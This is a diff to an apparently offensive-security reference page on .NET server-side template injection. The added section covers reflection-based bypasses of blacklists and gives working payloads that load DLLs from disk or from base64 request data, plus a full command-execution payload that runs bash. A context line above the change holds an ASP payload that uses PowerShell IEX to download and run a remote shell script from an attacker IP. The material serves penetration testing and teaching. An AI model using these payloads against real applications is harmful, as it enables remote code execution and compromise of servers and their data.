SSTI .NET techniques

Added techniques for bypassing restrictions in .NET templates with use of reflection mechanisms.

src/pentesting-web/ssti-server-side-template-injection/README.md

@@ -1020,6 +1020,25 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc
 <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
 ```
 
+### .Net Bypassing restrictions
+
+The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects.
+
+Dll's can be loaded with:
+
+- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?"))}` - from filesystem.
+- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("Load", [typeof(byte[])]).Invoke(null, [Convert.FromBase64String("Base64EncodedDll")])}` - directly from request.
+
+Full command execution:
+
+```
+{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?")).GetType("System.Diagnostics.Process").GetMethods().GetValue(0).Invoke(null, "/bin/bash,-c ""whoami""".Split(","))}
+```
+
+**More Information**
+
+- [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/)
+
 **More Information**
 
 - [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp)